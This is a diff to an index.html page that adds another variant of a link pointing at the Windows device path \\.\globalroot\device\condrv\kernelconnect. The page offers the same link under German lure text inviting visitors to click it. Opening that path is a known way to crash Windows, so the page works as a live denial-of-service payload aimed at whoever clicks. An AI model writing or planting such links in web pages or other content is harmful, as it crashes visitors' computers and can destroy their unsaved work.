--- a/index.html
+++ b/index.html
@@ -6,5 +6,6 @@
 <a href="\\.\globalroot\device\condrv\kernelconnect">Guckt mal link möchte geklickt werden</a> 
 <[URL]file:[/\\.\globalroot\device\condrv\kernelconnect[/URL]>
 <file:[/\\.\globalroot\device\condrv\kernelconnect>
+<"file:///\\.\globalroot\device\condrv\kernelconnect">
 </body>
 </html>
